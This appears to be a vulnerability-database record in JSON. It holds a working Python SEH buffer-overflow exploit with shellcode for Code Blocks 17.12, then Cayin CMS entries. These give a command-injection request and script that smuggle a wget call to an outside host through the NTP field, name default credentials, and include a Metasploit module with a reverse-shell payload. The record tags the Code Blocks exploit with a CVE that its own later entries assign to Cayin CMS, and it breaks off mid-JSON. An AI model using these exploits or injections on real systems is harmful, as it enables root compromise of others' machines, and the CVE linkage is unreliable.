Code Blocks 17.12 - Local Buffer Overflow

2020-06-21T09:07:10

Description

Code Blocks version 17.12 File Name SEH unicode local buffer overflow exploit.

{"id": "0DAYDB:C61B31D7BE88C299F0D8B258BC36ADC8", "bulletinFamily": "exploit", "title": "Code Blocks 17.12 - Local Buffer Overflow", "description": "Code Blocks version 17.12 File Name SEH unicode local buffer overflow exploit.", "published": "2020-06-21T09:07:10", "modified": "2020-06-21T09:07:11", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://0daydb.com/code-blocks-17-12-local-buffer-overflow.html", "reporter": "0daydb.com", "references": [], "cvelist": ["CVE-2020-7357"], "type": "0daydb", "lastseen": "2020-06-23T13:12:54", "edition": 2, "viewCount": 195, "enchantments": {"dependencies": {"references": [{"type": "0daydb", "idList": ["0DAYDB:C57A9B90D79DABF84D4F9466329F6A30", "0DAYDB:CEDEF1CFCB77584DD9FCF93507303E1D"]}, {"type": "attackerkb", "idList": ["AKB:D3C248C5-405C-43B4-B8A7-8E6E6966F7C4"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-1224"]}, {"type": "cve", "idList": ["CVE-2020-7357"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:158139"]}, {"type": "zdt", "idList": ["1337DAY-ID-34584"]}, {"type": "zeroscience", "idList": ["ZSL-2020-5570"]}], "rev": 4}, "score": {"value": 5.5, "vector": "NONE"}, "backreferences": {"references": [{"type": "0daydb", "idList": ["0DAYDB:C57A9B90D79DABF84D4F9466329F6A30", "0DAYDB:CEDEF1CFCB77584DD9FCF93507303E1D"]}, {"type": "attackerkb", "idList": ["AKB:D3C248C5-405C-43B4-B8A7-8E6E6966F7C4"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-1224"]}, {"type": "cve", "idList": ["CVE-2020-7357"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:158139"]}, {"type": "zdt", "idList": ["1337DAY-ID-34584"]}, {"type": "zeroscience", "idList": ["ZSL-2020-5570"]}]}, "exploitation": null, "vulnersScore": 5.5}, "sourceData": "# Exploit Title: Code Blocks 17.12 - 'File Name' Local Buffer Overflow (Unicode) (SEH) (PoC) \n# Vendor Homepage: http://www.codeblocks.org/ \n# Software Link Download: https://sourceforge.net/projects/codeblocks/files/Binaries/17.12/Windows/codeblocks-17.12-setup.exe/download\n# Exploit Author: Paras Bhatia\n# Discovery Date: 2020-06-16\n# Vulnerable Software: Code Blocks\n# Version: 17.12\n# Vulnerability Type: Local Buffer Overflow\n# Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English) \n\n#Steps to Produce the Crash:\n\n# 1.- Run python code: codeblocks.py\n# 2.- Copy content to clipboard\n# 3.- Turn off DEP for codeblocks.exe\n# 4.- Open \"codeblocks.exe\"\n# 5.- Go to \"File\" > \"New\" > \"Project...\"\n# 6.- Click on \"Files\" from left box > Select \"C/C++ header\" > Clickon \"Go\" > Click on \"Next\"\n# 7.- Paste ClipBoard into the \"Filename with fullpath:\" .\n# 8.- Click on \"Finish\".\n# 9.- Calc.exe runs.\n\n\n#################################################################################################################################################\n\n#Python \"codeblocks.py\" Code:\n\nf= open(\"codeblocks.txt\", \"w\")\n\njunk1=\"A\" * 2006\n\n\nnseh=\"\\x61\\x62\" #popad / align\n\n\n#Found pop edi - pop ebp - ret at 0x005000E0 [codeblocks.exe] ** Unicode compatible ** ** Null byte ** [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **] - C:\\Program Files\\CodeBlocks\\codeblocks.exe\nseh=\"\\xe0\\x50\" \n\nven = \"\\x62\" #align\nven +=\"\\x53\" #push ebx\nven += \"\\x62\" #align\nven += \"\\x58\" #pop eax\nven += \"\\x62\" #align\nven += \"\\x05\\x14\\x11\" #add eax, 0x11001400\nven += \"\\x62\" #align\nven += \"\\x2d\\x13\\x11\" #sub eax, 0x11001300\nven += \"\\x62\" #align\n\nven += \"\\x50\" #push eax\nven += \"\\x62\" #align\nven += \"\\xc3\" #ret\n\njunk2=\"\\x41\" * 108 #required to make sure shellcode = eax\n\n#msfvenom -p windows/exec cmd=calc.exe --platform windows -f py -e x86/unicode_mixed BufferRegister=EAX\nbuf = \"\"\nbuf += \"\\x50\\x50\\x59\\x41\\x49\\x41\\x49\\x41\\x49\\x41\\x49\\x41\\x49\"\nbuf += \"\\x41\\x49\\x41\\x49\\x41\\x49\\x41\\x49\\x41\\x49\\x41\\x49\\x41\"\nbuf += \"\\x49\\x41\\x49\\x41\\x49\\x41\\x6a\\x58\\x41\\x51\\x41\\x44\\x41\"\nbuf += \"\\x5a\\x41\\x42\\x41\\x52\\x41\\x4c\\x41\\x59\\x41\\x49\\x41\\x51\"\nbuf += \"\\x41\\x49\\x41\\x51\\x41\\x49\\x41\\x68\\x41\\x41\\x41\\x5a\\x31\"\nbuf += \"\\x41\\x49\\x41\\x49\\x41\\x4a\\x31\\x31\\x41\\x49\\x41\\x49\\x41\"\nbuf += \"\\x42\\x41\\x42\\x41\\x42\\x51\\x49\\x31\\x41\\x49\\x51\\x49\\x41\"\nbuf += \"\\x49\\x51\\x49\\x31\\x31\\x31\\x41\\x49\\x41\\x4a\\x51\\x59\\x41\"\nbuf += \"\\x5a\\x42\\x41\\x42\\x41\\x42\\x41\\x42\\x41\\x42\\x6b\\x4d\\x41\"\nbuf += \"\\x47\\x42\\x39\\x75\\x34\\x4a\\x42\\x59\\x6c\\x48\\x68\\x71\\x72\"\nbuf += \"\\x69\\x70\\x4b\\x50\\x49\\x70\\x73\\x30\\x53\\x59\\x69\\x55\\x50\"\nbuf += \"\\x31\\x49\\x30\\x33\\x34\\x62\\x6b\\x62\\x30\\x50\\x30\\x74\\x4b\"\nbuf += \"\\x42\\x32\\x6a\\x6c\\x62\\x6b\\x30\\x52\\x6d\\x44\\x74\\x4b\\x52\"\nbuf += \"\\x52\\x6c\\x68\\x5a\\x6f\\x34\\x77\\x6f\\x5a\\x4e\\x46\\x50\\x31\"\nbuf += \"\\x6b\\x4f\\x74\\x6c\\x4f\\x4c\\x6f\\x71\\x31\\x6c\\x6d\\x32\\x4c\"\nbuf += \"\\x6c\\x6f\\x30\\x56\\x61\\x66\\x6f\\x6a\\x6d\\x4b\\x51\\x69\\x37\"\nbuf += \"\\x67\\x72\\x48\\x72\\x42\\x32\\x6f\\x67\\x72\\x6b\\x52\\x32\\x5a\"\nbuf += \"\\x70\\x72\\x6b\\x70\\x4a\\x4d\\x6c\\x32\\x6b\\x6e\\x6c\\x5a\\x71\"\nbuf += \"\\x64\\x38\\x7a\\x43\\x31\\x38\\x4b\\x51\\x36\\x71\\x42\\x31\\x34\"\nbuf += \"\\x4b\\x30\\x59\\x4b\\x70\\x39\\x71\\x79\\x43\\x62\\x6b\\x6d\\x79\"\nbuf += \"\\x6b\\x68\\x6a\\x43\\x6c\\x7a\\x70\\x49\\x62\\x6b\\x50\\x34\\x52\"\nbuf += \"\\x6b\\x59\\x71\\x69\\x46\\x4c\\x71\\x79\\x6f\\x34\\x6c\\x65\\x71\"\nbuf += \"\\x46\\x6f\\x4c\\x4d\\x7a\\x61\\x76\\x67\\x70\\x38\\x6b\\x30\\x30\"\nbuf += \"\\x75\\x6c\\x36\\x79\\x73\\x63\\x4d\\x49\\x68\\x6d\\x6b\\x31\\x6d\"\nbuf += \"\\x6f\\x34\\x63\\x45\\x67\\x74\\x6e\\x78\\x54\\x4b\\x72\\x38\\x6c\"\nbuf += \"\\x64\\x4b\\x51\\x77\\x63\\x71\\x56\\x74\\x4b\\x6a\\x6c\\x6e\\x6b\"\nbuf += \"\\x64\\x4b\\x32\\x38\\x4b\\x6c\\x6a\\x61\\x38\\x53\\x74\\x4b\\x6b\"\nbuf += \"\\x54\\x34\\x4b\\x4a\\x61\\x68\\x50\\x44\\x49\\x4e\\x64\\x6f\\x34\"\nbuf += \"\\x4c\\x64\\x51\\x4b\\x4f\\x6b\\x53\\x31\\x6e\\x79\\x71\\x4a\\x32\"\nbuf += \"\\x31\\x79\\x6f\\x69\\x50\\x4f\\x6f\\x4f\\x6f\\x4f\\x6a\\x64\\x4b\"\nbuf += \"\\x6e\\x32\\x58\\x6b\\x54\\x4d\\x6f\\x6d\\x30\\x6a\\x4b\\x51\\x64\"\nbuf += \"\\x4d\\x45\\x35\\x55\\x62\\x49\\x70\\x4d\\x30\\x4d\\x30\\x72\\x30\"\nbuf += \"\\x73\\x38\\x4d\\x61\\x52\\x6b\\x72\\x4f\\x54\\x47\\x79\\x6f\\x66\"\nbuf += \"\\x75\\x75\\x6b\\x68\\x70\\x35\\x65\\x45\\x52\\x6f\\x66\\x4f\\x78\"\nbuf += \"\\x73\\x76\\x56\\x35\\x75\\x6d\\x35\\x4d\\x79\\x6f\\x69\\x45\\x4d\"\nbuf += \"\\x6c\\x79\\x76\\x43\\x4c\\x6b\\x5a\\x45\\x30\\x59\\x6b\\x57\\x70\"\nbuf += \"\\x34\\x35\\x49\\x75\\x57\\x4b\\x6e\\x67\\x4e\\x33\\x32\\x52\\x52\"\nbuf += \"\\x4f\\x71\\x5a\\x49\\x70\\x51\\x43\\x6b\\x4f\\x69\\x45\\x62\\x43\"\nbuf += \"\\x43\\x31\\x52\\x4c\\x33\\x33\\x4e\\x4e\\x31\\x55\\x31\\x68\\x53\"\nbuf += \"\\x35\\x6d\\x30\\x41\\x41\"\n\n\n\n\njunk3 = \"\\x62\" * 5000 #padding to crash\n\n\n\npayload = junk1 + nseh + seh + ven + junk2 + buf +junk3\n\nf.write(payload)\nf.close", "immutableFields": [], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "COMPLETE", "baseScore": 9.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.9, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.1, "impactScore": 6.0}, "scheme": null, "_state": {"dependencies": 1645653713}}

{"checkpoint_advisories": [{"lastseen": "2022-02-16T19:36:51", "description": "A command injection vulnerability exists in Cayin CMS. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary commands on the affected system.", "cvss3": {"exploitabilityScore": 3.1, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.9, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-11-28T00:00:00", "type": "checkpoint_advisories", "title": "Cayin CMS Command Injection (CVE-2020-7357)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-7357"], "modified": "2020-11-28T00:00:00", "id": "CPAI-2020-1224", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "zeroscience": [{"lastseen": "2021-12-10T19:53:43", "description": "Title: Cayin Content Management Server 11.0 Root Remote Command Injection \nAdvisory ID: [ZSL-2020-5570](<ZSL-2020-5570.php>) \nType: Local/Remote \nImpact: System Access, DoS \nRisk: (4/5) \nRelease Date: 04.06.2020 \n\n\n##### Summary\n\nCAYIN Technology provides Digital Signage solutions, including media players, servers, and software designed for the DOOH (Digital Out-of-home) networks. We develop industrial-grade digital signage appliances and tailored services so you don't have to do the hard work. \n\n##### Description\n\nCAYIN CMS suffers from an authenticated OS semi-blind command injection vulnerability using default credentials. This can be exploited to inject and execute arbitrary shell commands as the root user through the 'NTP_Server_IP' HTTP POST parameter in system.cgi page. \n\n##### Vendor\n\nCAYIN Technology Co., Ltd. - <https://www.cayintech.com>\n\n##### Affected Version\n\nCMS-SE v11.0 Build 19179 \nCMS-SE v11.0 Build 19025 \nCMS-SE v11.0 Build 18325 \nCMS Station (CMS-SE-LXC) \nCMS-60 v11.0 Build 19025 \nCMS-40 v9.0 Build 14197 \nCMS-40 v9.0 Build 14099 \nCMS-40 v9.0 Build 14093 \nCMS-20 v9.0 Build 14197 \nCMS-20 v9.0 Build 14092 \nCMS v8.2 Build 12199 \nCMS v8.0 Build 11175 \nCMS v7.5 Build 11175 \n\n##### Tested On\n\nApache/1.3.42 (Unix) \n\n##### Vendor Status\n\n[15.05.2020] Vulnerability discovered. \n[23.05.2020] Vendor contacted. \n[25.05.2020] Vendor responds asking more details. \n[25.05.2020] Sent details to the vendor. \n[04.06.2020] No response from the vendor. \n[04.06.2020] Public security advisory released. \n\n##### PoC\n\n[cayin_cms.txt](<../../codes/cayin_cms.txt>)\n\n##### Credits\n\nVulnerability discovered by Gjoko Krstic - <[gjoko@zeroscience.mk](<mailto:gjoko@zeroscience.mk>)>\n\n##### References\n\n[1] <https://www.exploit-db.com/exploits/48553> \n[2] <https://packetstormsecurity.com/files/157944> \n[3] <https://exchange.xforce.ibmcloud.com/vulnerabilities/182925> \n[4] <https://cxsecurity.com/issue/WLB-2020060076> \n[5] <https://blog.rapid7.com/2020/06/19/metasploit-wrap-up-69/> \n[6] <https://github.com/rapid7/metasploit-framework/pull/13607> \n[7] <https://www.rapid7.com/db/modules/exploit/linux/http/cayin_cms_ntp> \n[8] <https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/cayin_cms_ntp.rb> \n[9] <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7357> \n[10] <https://packetstormsecurity.com/files/158139>\n\n##### Changelog\n\n[04.06.2020] - Initial release \n[05.06.2020] - Added reference [1], [2] and [3] \n[22.06.2020] - Added reference [4], [5], [6], [7], [8] and [9] \n[03.07.2020] - Added reference [10] \n\n##### Contact\n\nZero Science Lab \n \nWeb: <https://www.zeroscience.mk> \ne-mail: [lab@zeroscience.mk](<mailto:lab@zeroscience.mk>)\n", "cvss3": {"exploitabilityScore": 3.1, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.9, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-06-04T00:00:00", "type": "zeroscience", "title": "Cayin Content Management Server 11.0 Root Remote Command Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-7357"], "modified": "2020-06-04T00:00:00", "id": "ZSL-2020-5570", "href": "http://zeroscience.mk/en/vulnerabilities/ZSL-2020-5570.php", "sourceData": "<html><body><p>Cayin Content Management Server 11.0 Root Remote Command Injection\r\n\r\n\r\nVendor: CAYIN Technology Co., Ltd.\r\nProduct web page: https://www.cayintech.com\r\nAffected version: CMS-SE v11.0 Build 19179\r\n CMS-SE v11.0 Build 19025\r\n CMS-SE v11.0 Build 18325\r\n CMS Station (CMS-SE-LXC)\r\n CMS-60 v11.0 Build 19025\r\n CMS-40 v9.0 Build 14197\r\n CMS-40 v9.0 Build 14099\r\n CMS-40 v9.0 Build 14093\r\n CMS-20 v9.0 Build 14197\r\n CMS-20 v9.0 Build 14092\r\n CMS v8.2 Build 12199\r\n CMS v8.0 Build 11175\r\n CMS v7.5 Build 11175\r\n\r\nSummary: CAYIN Technology provides Digital Signage\r\nsolutions, including media players, servers, and\r\nsoftware designed for the DOOH (Digital Out-of-home)\r\nnetworks. We develop industrial-grade digital signage\r\nappliances and tailored services so you don't have\r\nto do the hard work.\r\n\r\nDesc: CAYIN CMS suffers from an authenticated OS\r\nsemi-blind command injection vulnerability using\r\ndefault credentials. This can be exploited to inject\r\nand execute arbitrary shell commands as the root\r\nuser through the 'NTP_Server_IP' HTTP POST parameter\r\nin system.cgi page.\r\n\r\nTested on: Apache/1.3.42 (Unix)\r\n\r\n\r\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n\r\n\r\nAdvisory ID: ZSL-2020-5570\r\nAdvisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5570.php\r\n\r\n\r\n15.05.2020\r\n\r\n---\r\n\r\n\r\nSession created with default credentials (webadmin:bctvadmin).\r\n\r\nHTTP POST Request:\r\n-----------------\r\n\r\nPOST /cgi-bin/system.cgi HTTP/1.1\r\nHost: 192.168.1.3\r\nContent-Length: 201\r\nPragma: no-cache\r\nCache-Control: no-cache\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Smith\r\nOrigin: http://192.168.1.3\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\r\nReferer: http://192.168.1.3/cgi-bin/system.cgi\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\nCookie: cy_lang=ZH_TW; cy_us=67176fd7d3d05812008; cy_en=c8bef8607e54c99059cc6a36da982f9c009; WEB_STR_RC_MGR=RC_MGR_WEB_PLAYLIST; WEB_STR_SYSTEM=SYSTEM_SETTING; cy_cgi_tp=1591206269_15957\r\nConnection: close\r\n\r\n\r\nsave_system: 1\r\nsystem_date: 2020/5/16 06:36:48\r\nTIMEZONE: 49\r\nNTP_Service: 1\r\nNTP_Server_IP: $(wget -q -U 'MyVoiceIsMyPassportVerifyMe' vrfy.zeroscience.mk)\r\nTEST_NTP: \u6e2c\u8a66\r\nreboot1: 1\r\nreboot_sel1: 4\r\nreboot_sel2: 1\r\nreboot_sel3: 1\r\nfont_list: ZH_TW\r\n\r\n\r\nRequest recorder @ ZSL:\r\n-----------------------\r\n\r\nOrigin of HTTP request: 192.168.1.3:61347\r\nHTTP GET request to vrfy.zeroscience.mk:\r\n\r\nGET / HTTP/1.0\r\nUser-Agent: MyVoiceIsMyPassportVerifyMe\r\nHost: vrfy.zeroscience.mk\r\nAccept: */*\r\nConnection: Keep-Alive\r\n\r\n\r\nPoC script:\r\n-----------\r\n\r\nimport requests\r\n\r\nurl = \"http://192.168.1.3:80/cgi-bin/system.cgi\"\r\n\r\ncookies = {\"cy_lang\": \"ZH_TW\",\r\n \"cy_us\": \"67176fd7d3d05812008\",\r\n \"cy_en\": \"c8bef8607e54c99059cc6a36da982f9c009\",\r\n \"WEB_STR_RC_MGR\": \"RC_MGR_WEB_PLAYLIST\",\r\n \"WEB_STR_SYSTEM\": \"SYSTEM_SETTING\",\r\n \"cy_cgi_tp\": \"1591206269_15957\"}\r\n\r\nheaders = {\"Cache-Control\": \"max-age=0\",\r\n \"Origin\": \"http://192.168.1.3\",\r\n \"Content-Type\": \"application/x-www-form-urlencoded\",\r\n \"User-Agent\": \"Smith\",\r\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\",\r\n \"Referer\": \"http://192.168.1.3/cgi-bin/system.cgi\",\r\n \"Accept-Encoding\": \"gzip, deflate\",\r\n \"Accept-Language\": \"en-US,en;q=0.9\",\r\n \"Connection\": \"close\"}\r\n\r\ndata = {\"save_system\": \"1\",\r\n \"system_date\": \"2020/5/16 06:36:48\",\r\n \"TIMEZONE\": \"49\",\r\n \"NTP_Service\": \"1\",\r\n \"NTP_Server_IP\": \"$(wget -q -U 'MyVoiceIsMyPassportVerifyMe' vrfy.zeroscience.mk)\", # `cmd` or &cmd&\r\n \"TEST_NTP\": \"\\xe6\\xb8\\xac\\xe8\\xa9\\xa6\",\r\n \"reboot1\": \"1\",\r\n \"reboot_sel1\": \"4\",\r\n \"reboot_sel2\": \"1\",\r\n \"reboot_sel3\": \"1\",\r\n \"font_list\": \"ZH_TW\"}\r\n\r\nrequests.post(url, headers=headers, cookies=cookies, data=data)\r\n</p></body></html>", "sourceHref": "http://zeroscience.mk/codes/cayin_cms.txt", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2021-12-22T05:21:29", "description": "This Metasploit module exploits an authenticated remote code execution vulnerability in Cayin CMS versions 11.0 and below. The code execution is executed in the system_service.cgi file's ntpIp Parameter. The field is limited in size, so repeated requests are made to achieve a larger payload. Cayin CMS-SE is built for Ubuntu 16.04 (20.04 failed to install correctly), so the environment should be pretty set and not dynamic between targets. Results in root level access.", "cvss3": {"exploitabilityScore": 3.1, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.9, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-06-18T00:00:00", "type": "zdt", "title": "Cayin CMS NTP Server 11.0 Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-7357"], "modified": "2020-06-18T00:00:00", "id": "1337DAY-ID-34584", "href": "https://0day.today/exploit/description/34584", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::FileDropper\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Cayin CMS NTP Server RCE',\n 'Description' => %q{\n This module exploits an authenticated RCE in Cayin CMS <= 11.0. The RCE is executed\n in the system_service.cgi file's ntpIp Parameter. The field is limited in size, so\n repeated requests are made to achieve a larger payload.\n Cayin CMS-SE is built for Ubuntu 16.04 (20.04 failed to install correctly), so the\n environment should be pretty set and not dynamic between targets.\n Results in root level access.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'h00die', # msf module\n 'Gjoko Krstic (LiquidWorm) <[email\u00a0protected]>' # original PoC, discovery\n ],\n 'References' =>\n [\n [ 'EDB', '48553' ],\n [ 'URL', 'https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5571.php' ],\n [ 'CVE', '2020-7357' ]\n ],\n 'Platform' => ['linux'],\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp'\n },\n 'Privileged' => true,\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Targets' =>\n [\n [ 'Automatic Target', {}]\n ],\n 'DisclosureDate' => 'Jun 4 2020',\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK, CONFIG_CHANGES]\n }\n )\n )\n register_options(\n [\n Opt::RPORT(80),\n OptString.new('TARGETURI', [true, 'The URI of Cayin CMS', '/']),\n OptString.new('USERNAME', [true, 'Username to login with', 'administrator']),\n OptString.new('PASSWORD', [true, 'Username to login with', 'admin']),\n # from the original advisory, leaving here just in case\n # OptString.new('USERNAME', [true, 'Username to login with', 'webadmin'])\n # OptString.new('PASSWORD', [true, 'Username to login with', 'bctvadmin'])\n ]\n )\n end\n\n def check\n res = send_request_cgi(\n 'uri' => normalize_uri(target_uri.path, 'cgi-bin', 'login.cgi')\n )\n\n if res.nil? || res.code != 200\n return CheckCode::Safe('Could not connect to the web service, check URI Path and IP')\n end\n\n if res.body.include?('var model = \"CMS') && res.body.include?('STR_CAYIN_LOGO')\n print_good('Cayin CMS install detected')\n return CheckCode::Detected\n end\n\n CheckCode::Safe\n rescue ::Rex::ConnectionError\n CheckCode::Safe('Could not connect to the web service, check URI Path and IP')\n end\n\n def login\n res = send_request_cgi(\n 'uri' => normalize_uri(target_uri.path, 'cgi-bin', 'login.cgi'),\n 'method' => 'POST',\n 'vars_post' => {\n 'apply_mode' => 'login',\n 'lang' => 'ENG',\n 'username' => datastore['USERNAME'],\n 'password' => datastore['PASSWORD']\n }\n )\n\n fail_with(Failure::UnexpectedReply, \"#{peer} - Could not connect to web service - no response\") if res.nil?\n\n # instead of a 302 like most apps, this does a script window.location to forward...\n unless res.code == 200 && res.body.include?('/cgi-bin/system_status.cgi')\n fail_with(Failure::BadConfig, \"#{peer} - Login failed. Check username and password\")\n end\n\n res.get_cookies\n end\n\n def execute_command(cmd, _opts = {})\n # originally attempted to use the 'test' functionality, however it attempts 3 times which\n # means our exploit code stage chunks are written 3 times.\n # also attempted to just 'save', however it doesn't execute an update.\n # 'update' was the prefered functionality\n send_request_cgi(\n 'uri' => normalize_uri(target_uri.path, 'cgi-bin', 'system_service.cgi'),\n 'method' => 'POST',\n 'cookie' => \"#{@cookie} sys=Service\",\n 'vars_post' => {\n 'exe' => 'webSvrUpdateNtp',\n 'ntpIp' => \"`#{cmd}`\"\n\n # test button, executes 3 times\n # 'exe' => 'webSvrTestNtp', # just do the 'test', doesnt change config and still runs\n # 'ntpIp' => \"`#{cmd}`\"\n\n # save button, but doesnt execute\n # 'save' => 'webSvrNtp',\n # 'ntpIp' => \"`#{cmd}`\",\n # 'ntpEnable' => 1,\n # 'ntp_server' => 0\n }\n )\n end\n\n def exploit\n if check != CheckCode::Detected\n fail_with(Failure::NotVulnerable, 'Target is not vulnerable')\n end\n\n @cookie = login\n execute_cmdstager(flavor: :printf, linemax: 200)\n rescue ::Rex::ConnectionError\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect to the web service\")\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/34584", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-03-23T18:53:08", "description": "Cayin CMS suffers from an authenticated OS semi-blind command injection vulnerability using default credentials. This can be exploited to inject and execute arbitrary shell commands as the root user through the 'NTP_Server_IP' HTTP POST parameter in system.cgi page. This issue affects several branches and versions of the CMS application, including CME-SE, CMS-60, CMS-40, CMS-20, and CMS version 8.2, 8.0, and 7.5.", "cvss3": {"exploitabilityScore": 3.1, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 9.9, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-08-06T16:15:00", "type": "cve", "title": "CVE-2020-7357", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-7357"], "modified": "2020-08-11T19:42:00", "cpe": ["cpe:/o:cayintech:cms-se_firmware:11.0", "cpe:/o:cayintech:cms-se-lxc_firmware:-", "cpe:/o:cayintech:cms:8.2", "cpe:/o:cayintech:cms-20_firmware:9.0", 